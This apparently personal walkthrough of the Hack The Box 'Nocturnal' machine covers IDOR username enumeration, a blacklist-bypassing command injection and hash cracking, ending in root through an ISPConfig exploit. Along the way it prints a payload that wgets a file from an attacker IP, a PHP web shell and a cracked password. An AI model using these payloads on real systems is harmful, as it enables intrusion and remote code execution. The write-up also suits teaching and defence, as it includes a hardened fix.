HTB-nocturnal

User

➜  nocturnal dirsearch -u http://nocturnal.htb/ --crawl

_|. _ _ _ _ _ _|_ v0.4.3.post1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /Users/r3tr0/hack/hackthebox/machines/nocturnal/reports/http_nocturnal.htb/__25-04-14_16-16-24.txt

Target: http://nocturnal.htb/

[16:16:24] Starting:
[16:16:40] 302 - 0B - /admin.php -> login.php
[16:16:49] 301 - 178B - /backups -> http://nocturnal.htb/backups/
[16:16:50] 403 - 564B - /backups/
[16:16:58] 302 - 0B - /dashboard.php -> login.php
[16:17:07] 200 - 644B - /login.php
[16:17:07] 200 - 649B - /register.php
[16:17:07] 302 - 0B - /logout.php -> login.php
[16:17:23] 403 - 564B - /uploads
[16:17:23] 403 - 564B - /uploads/affwp-debug.log
[16:17:23] 403 - 564B - /uploads/
[16:17:23] 403 - 564B - /uploads/dump.sql
[16:17:23] 403 - 564B - /uploads_admin
[16:17:25] 302 - 3KB - /view.php -> login.php

Task Completed

The site has login and registration pages. After registering an account I found a file upload feature. Once a file is uploaded, the link used to view it (view.php?username=...&file=...) looks the file up by username and file name with no ownership check, so it both confirms whether a username exists and lets you download any user's uploads (an IDOR). I used ffuf to brute-force usernames and pull out sensitive data:

➜  nocturnal ffuf -u "http://nocturnal.htb/view.php?username=FUZZ&file=pwn.xlsx" -w /Users/r3tr0/hack/KaliLists/SecLists-master/Usernames/xato-net-10-million-usernames-dup.txt -H "Cookie: PHPSESSID=n3jb8nvahqclf3h6fe2af6qvdk" -fs 2985

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://nocturnal.htb/view.php?username=FUZZ&file=pwn.xlsx
:: Wordlist : FUZZ: /Users/r3tr0/hack/KaliLists/SecLists-master/Usernames/xato-net-10-million-usernames-dup.txt
:: Header : Cookie: PHPSESSID=n3jb8nvahqclf3h6fe2af6qvdk
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 2985
________________________________________________

admin [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 240ms]
amanda [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 101ms]
tobias [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 76ms]
retro [Status: 200, Size: 3115, Words: 1177, Lines: 129, Duration: 77ms]
nocturnal [Status: 200, Size: 3116, Words: 1175, Lines: 129, Duration: 87ms]
admin123 [Status: 200, Size: 3279, Words: 1177, Lines: 129, Duration: 74ms]
sonnyc-Leclair# [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 1921ms]
selm#at1-vatican1 [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 83ms]
n#3ton [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 79ms]
lumitrak [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 98ms]
luminus [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 99ms]
luminox [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luminati [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 80ms]
luminary [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 80ms]
luminari [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
luminale [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
luminarc [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
luminal [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 86ms]
lumilode [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumierboss [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumie [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumes [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumi.hautaniemi [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumens [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 79ms]
lumenica1 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumene07 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lumenandrain [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lumbur2 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lumen-rostik [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lume2000 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 88ms]
lumbjmk [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumbertis [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 74ms]
lumberman [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumberjk [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 75ms]
lumbergh55 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 76ms]
lumberjax61 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumber1 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumbatzi [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumas1-scrw33 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 77ms]
lumaluma [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum4life [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum6erjack [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lulyapa [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
lum100 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 79ms]
luly234 [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luly-wi [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 78ms]
luluz [Status: 500, Size: 2919, Words: 1167, Lines: 123, Duration: 101ms]
jdog#1 [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 78ms]
gR##Efisher [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 86ms]
gR##E [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 86ms]
dansss#1 [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 91ms]
dV1oG#eL [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 75ms]
andy2977# [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 91ms]
Joey#1 [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 90ms]
AHasegawa#D [Status: 200, Size: 2967, Words: 1170, Lines: 123, Duration: 76ms]
:: Progress: [624370/624370] :: Job [1/1] :: 465 req/sec :: Duration: [0:22:38] :: Errors: 1 ::
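The enumeration above, rewritten as a small script, as an added example that is not part of the original write-up: it percent-encodes the username before sending it (which removes the `#` false positives in the ffuf output, where an unencoded `#` becomes a URL fragment and the parameters never reach the server), treats 5xx responses as retries rather than results (the run of `lum*` rows are server errors, not accounts), and applies the same 2985-byte baseline as the ffuf `-fs` filter. The base URL, file name and baseline are taken from the ffuf command; the session cookie value is a placeholder, and the fetcher is injectable so the logic runs offline against a constructed stand-in for the server.

```python
"""Username enumeration through view.php's username/file IDOR.

Added example for this write-up, not code from the original post. It assumes
the URL shape and the 2985-byte baseline taken from the ffuf run above, and a
valid PHPSESSID for a registered account (placeholder value below).
"""
from typing import Callable, Dict, Iterable, Tuple
from urllib.error import HTTPError
from urllib.parse import quote, unquote
from urllib.request import HTTPRedirectHandler, Request, build_opener

BASE_URL = "http://nocturnal.htb/view.php"
FILE_NAME = "pwn.xlsx"        # any file name; only the username lookup matters
BASELINE_SIZE = 2985          # size of the "nothing to show" page (ffuf -fs 2985)

# (url, cookie) -> (status, body length); injectable so the logic runs offline
Fetcher = Callable[[str, str], Tuple[int, int]]


def build_url(username: str) -> str:
    """Percent-encode the username: ffuf sends the raw word, so a '#' in a
    wordlist entry becomes a URL fragment and neither username nor file ever
    reaches the server. That is why every '#' hit above has the same size."""
    return (f"{BASE_URL}?username={quote(username, safe='')}"
            f"&file={quote(FILE_NAME, safe='')}")


class _NoRedirect(HTTPRedirectHandler):
    """Surface a 302 (expired session -> login.php) as an HTTPError."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str, cookie: str) -> Tuple[int, int]:
    """Real fetcher: one GET carrying the session cookie, redirects not followed."""
    opener = build_opener(_NoRedirect)
    try:
        with opener.open(Request(url, headers={"Cookie": cookie}), timeout=10) as resp:
            return resp.status, len(resp.read())
    except HTTPError as err:
        return err.code, len(err.read())


def classify(status: int, size: int) -> str:
    """Mirror the ffuf matcher/filter: 200 with a non-baseline size is a hit
    (the page lists that user's files), a 5xx says nothing about the user,
    anything else is a miss."""
    if status >= 500:
        return "error"
    if status == 200 and size != BASELINE_SIZE:
        return "hit"
    return "miss"


def enumerate_users(wordlist: Iterable[str], cookie: str,
                    fetch: Fetcher = http_fetch, retries: int = 2) -> Dict[str, int]:
    """Return {username: response_size} for every name whose page differs
    from the baseline, retrying 5xx responses instead of recording them."""
    hits: Dict[str, int] = {}
    for name in wordlist:
        url = build_url(name)
        verdict = "error"
        size = 0
        for _ in range(retries + 1):
            status, size = fetch(url, cookie)
            verdict = classify(status, size)
            if verdict != "error":
                break
        if verdict == "hit":
            hits[name] = size
    return hits


# --- constructed offline stand-in for the target, using sizes seen in the ffuf run ---
_FAKE_SERVER = {
    "admin": (200, 3037), "amanda": (200, 3113), "tobias": (200, 3037),
    "luminus": (500, 2919),             # persistent server error: must not be a hit
}
_flaky_calls = {"count": 0}


def fake_fetch(url: str, cookie: str) -> Tuple[int, int]:
    """Constructed responses; 'flaky' answers 500 once, then a real listing."""
    name = unquote(url.split("username=")[1].split("&")[0])
    if name == "flaky":
        _flaky_calls["count"] += 1
        return (500, 2919) if _flaky_calls["count"] == 1 else (200, 3037)
    return _FAKE_SERVER.get(name, (200, BASELINE_SIZE))


if __name__ == "__main__":
    words = ["admin", "amanda", "tobias", "luminus", "flaky", "nobody", "sonnyc-Leclair#"]
    print(enumerate_users(words, "PHPSESSID=placeholder", fetch=fake_fetch))
    # drop fetch=fake_fetch and pass a real cookie to run it against the box
```

Against the real target, pass the wordlist from the ffuf command and the real cookie with the default `http_fetch`; the hits that matter for this box are admin, amanda and tobias.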

Of those results, admin, amanda and tobias are the real accounts; the names containing `#` are false positives (ffuf sends the `#` unencoded, so it becomes a URL fragment and the username and file parameters never reach the server, which is why they all share the same 2967-byte response), and the 500s are server errors, not evidence of a user. Under the amanda user I found a sensitive file, privacy.odt, containing that user's initial password. Logging in with it reaches the admin area (admin.php admits both admin and amanda, see the session check in the source below), which lists and displays the site's PHP source files and offers a downloadable backup of the whole web root. After downloading the backup, admin.php looked like it might contain a command injection. Part of admin.php follows:

<?php
session_start();

if (!isset($_SESSION['user_id']) || ($_SESSION['username'] !== 'admin' && $_SESSION['username'] !== 'amanda')) {
    header('Location: login.php');
    exit();
}

function sanitizeFilePath($filePath) {
    return basename($filePath); // Only gets the base name of the file
}

// List only PHP files in a directory
function listPhpFiles($dir) {
    $files = array_diff(scandir($dir), ['.', '..']);
    echo "<ul class='file-list'>";
    foreach ($files as $file) {
        $sanitizedFile = sanitizeFilePath($file);
        if (is_dir($dir . '/' . $sanitizedFile)) {
            // Recursively call to list files inside directories
            echo "<li class='folder'>📁 <strong>" . htmlspecialchars($sanitizedFile) . "</strong>";
            echo "<ul>";
            listPhpFiles($dir . '/' . $sanitizedFile);
            echo "</ul></li>";
        } else if (pathinfo($sanitizedFile, PATHINFO_EXTENSION) === 'php') {
            // Show only PHP files
            echo "<li class='file'>📄 <a href='admin.php?view=" . urlencode($sanitizedFile) . "'>" . htmlspecialchars($sanitizedFile) . "</a></li>";
        }
    }
    echo "</ul>";
}

// View the content of the PHP file if the 'view' option is passed
if (isset($_GET['view'])) {
    $file = sanitizeFilePath($_GET['view']);
    $filePath = __DIR__ . '/' . $file;
    if (file_exists($filePath) && pathinfo($filePath, PATHINFO_EXTENSION) === 'php') {
        $content = htmlspecialchars(file_get_contents($filePath));
    } else {
        $content = "File not found or invalid path.";
    }
}

function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}


?>

<?php
if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';

        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";

        $descriptor_spec = [
            0 => ["pipe", "r"], // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];

        $process = proc_open($command, $descriptor_spec, $pipes);
        if (is_resource($process)) {
            proc_close($process);
        }

        sleep(2);

        $logContents = file_get_contents($logFile);
        if (strpos($logContents, 'zip error') === false) {
            echo "<div class='backup-success'>";
            echo "<p>Backup created successfully.</p>";
            echo "<a href='" . htmlspecialchars($backupFile) . "' class='download-button' download>Download Backup</a>";
            echo "<h3>Output:</h3><pre>" . htmlspecialchars($logContents) . "</pre>";
            echo "</div>";
        } else {
            echo "<div class='error-message'>Error creating the backup.</div>";
        }

        unlink($logFile);
    }
}

Injection point (the password is concatenated straight into a string that proc_open() runs through the shell):

$command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " .  > " . $logFile . " 2>&1 &";

The blacklist that is supposed to stop command injection:

function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

I tried the usual tricks for getting past strpos(), but the check compares strictly (`!== false`), so there is no loose-comparison bug to abuse; time for another approach.

Searching around (peeking at someone else's cheat sheet) showed that a newline and a few other special characters get past this blacklist.

For the record, these are the characters that can stand in for a space: `<`, `<>`, `%20` (space), `%09` (tab), `$IFS$9`, `${IFS}`, `$IFS` (source: https://blog.csdn.net/qq_45655564/article/details/117395152). On this box the literal space, `$`, `{` and `}` are all blacklisted, so the tab (`%09`) is the one that remains usable.

With `;`, `&`, `|` and the other common command separators filtered, `%0A` (newline) can be used to chain commands instead: proc_open() hands the string to sh, and an unquoted newline ends a command just as `;` does.

Final payload:

# http://nocturnal.htb/admin.php
#
password=%0Abash%09-c%09"wget%0910.10.16.21:81/s.php"%0A&backup=

# s.php
<?php echo `$_REQUEST[1]`; ?>
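To see exactly why the blacklist lets that payload through, here is a Python model of cleanEntry() and the command string admin.php builds, with a hardened variant alongside. This is an added example written for this write-up, not code from the box: the backup and log paths are fixed stand-ins for the date()- and uniqid()-based names the real script generates, and the allowlist charset in the hardened version is this example's choice.

```python
"""Model of admin.php's cleanEntry() and the zip command string it feeds.

Added example for this write-up, not code from the box. The backup and log
paths are fixed stand-ins for the date()- and uniqid()-based names the real
script builds; the allowlist in the hardened version is this example's choice.
"""
import re
import shlex
from html import escape
from typing import List, Union
from urllib.parse import quote

# Copied from cleanEntry(): newline, tab and '"' are not in it.
BLACKLIST = [';', '&', '|', '$', ' ', '`', '{', '}', '&&']

# The payload from the write-up, decoded from its URL-encoded form.
PAYLOAD = '\nbash\t-c\t"wget\t10.10.16.21:81/s.php"\n'


def clean_entry(entry: str) -> Union[str, bool]:
    """Port of cleanEntry(): strict substring check, then htmlspecialchars
    with ENT_QUOTES (Python writes &#x27; where PHP writes &#039;)."""
    for ch in BLACKLIST:
        if ch in entry:
            return False
    return escape(entry, quote=True)


def build_command(password: str,
                  backup_file: str = "backups/backup_2025-04-21.zip",
                  log_file: str = "/tmp/backup_x.log") -> str:
    """The string admin.php hands to proc_open(), which runs it via sh -c."""
    return f"zip -x './backups/*' -r -P {password} {backup_file} . > {log_file} 2>&1 &"


def shell_lines(command: str) -> List[str]:
    """Nothing quotes the password, so each newline ends a command for sh;
    return the separate commands the shell will run."""
    return [line for line in command.split("\n") if line.strip()]


def post_body(password: str) -> str:
    """URL-encode the password into the POST body admin.php expects."""
    return f"password={quote(password, safe='')}&backup="


# --- hardened form: allowlist plus an argument vector, no shell string at all ---
SAFE_PASSWORD = re.compile(r"[A-Za-z0-9._-]{8,64}")   # example charset


def clean_entry_hardened(entry: str) -> Union[str, bool]:
    """Allowlist: reject anything outside a fixed charset instead of
    hunting for known-bad characters."""
    return entry if SAFE_PASSWORD.fullmatch(entry) else False


def build_argv(password: str, backup_file: str) -> List[str]:
    """Argument vector for zip; pass it to proc_open() as an array (PHP >= 7.4)
    or subprocess.run() so no shell ever parses the password."""
    return ["zip", "-x", "./backups/*", "-r", "-P", password, backup_file, "."]


if __name__ == "__main__":
    cleaned = clean_entry(PAYLOAD)
    print(post_body(PAYLOAD))
    for line in shell_lines(build_command(cleaned)):
        print(repr(line))                 # three separate commands, 'bash' on its own line
    print(clean_entry_hardened(PAYLOAD))  # False
    print(shlex.join(build_argv(PAYLOAD, "backups/b.zip")))  # password stays one argument
```

Running it shows the blacklist rejecting `a;id` and `a b` while passing the newline/tab payload untouched apart from the quotes, which come out as `&quot;`. If the string form of the command has to stay, escapeshellarg() on $password is the minimal PHP fix; the argv form removes the shell from the picture entirely.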

Two details about that payload. cleanEntry() runs the password through htmlspecialchars() with ENT_QUOTES, so the shell receives `&quot;` rather than the literal double quotes, and the `bash -c "..."` wrapper is not what actually executes; the fetch still happens because the newline separates the injected line from `zip`, and the `;` and `&` inside `&quot;` act as command separators in their own right. The downloaded s.php lands in the PHP process's working directory, which here is the web root (the same `.` the backup command archives), so requesting s.php with a command in the `1` parameter gives a web shell.

Looking around from there, the directory above the web root contains a database file. Downloading it reveals user password hashes, which can be cracked offline with a wordlist or looked up in an online hash database.

➜  nocturnal hashcat -m 0 -a 0 '55c82b1ccd55ab219b3b109b07d5061d' /Users/r3tr0/hack/KaliLists/rockyou.txt 
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
You have been warned.

METAL API (Metal 343.19)
========================
* Device #1: Apple M2, 5408/10922 MB, 8MCU

OpenCL API (OpenCL 1.2 (Apr 13 2024 11:09:23)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 140 MB

Dictionary cache built:
* Filename..: /Users/r3tr0/hack/KaliLists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 55c82b1ccd55ab219b3b109b07d5061d
Time.Started.....: Mon Apr 21 10:07:09 2025 (1 sec)
Time.Estimated...: Mon Apr 21 10:07:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/Users/r3tr0/hack/KaliLists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24388.6 kH/s (5.23ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3670016/14344385 (25.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: sn781225 -> rogans
Hardware.Mon.#1..: Util: 40%

Started: Mon Apr 21 10:07:03 2025
Stopped: Mon Apr 21 10:07:11 2025

That yields the credentials 55c82b1ccd55ab219b3b109b07d5061d:slowmotionapocalypse; the hash belongs to tobias, and the password works for SSH.

Root

tobias@nocturnal:~$ netstat -antpl
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 10.10.11.64:80 10.10.16.5:45398 FIN_WAIT2 -
tcp 0 0 127.0.0.1:8080 127.0.0.1:55550 TIME_WAIT -
tcp 0 0 127.0.0.1:8080 127.0.0.1:39964 TIME_WAIT -
tcp 0 0 10.10.11.64:22 10.10.16.21:63137 ESTABLISHED -
tcp 0 360 10.10.11.64:22 10.10.16.21:65192 ESTABLISHED -
tcp 0 0 10.10.11.64:80 10.10.16.5:58146 FIN_WAIT2 -
tcp 0 0 10.10.11.64:80 10.10.16.5:60798 FIN_WAIT2 -
tcp 0 0 127.0.0.1:8080 127.0.0.1:60292 TIME_WAIT -
tcp 0 0 10.10.11.64:80 10.10.16.5:59680 FIN_WAIT2 -
tcp 0 0 10.10.11.64:22 10.10.16.22:64081 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -

A service is listening on 8080 bound to loopback only; forward it out to local port 9090 and take a look:

1
ssh tobias@nocturnal.htb -L 9090:127.0.0.1:8080

The same forward can be set up with chisel or a similar tunnelling tool; either way the site is then reachable at http://127.0.0.1:9090 on the attacking machine.

The forwarded service is an ISPConfig install, and there is a matching public exploit: https://sploitus.com/exploit?id=C8C641AC-8810-5B1B-878E-D064A44248BB

The ISPConfig login is admin with the same password as the tobias user; running the exploit gives root.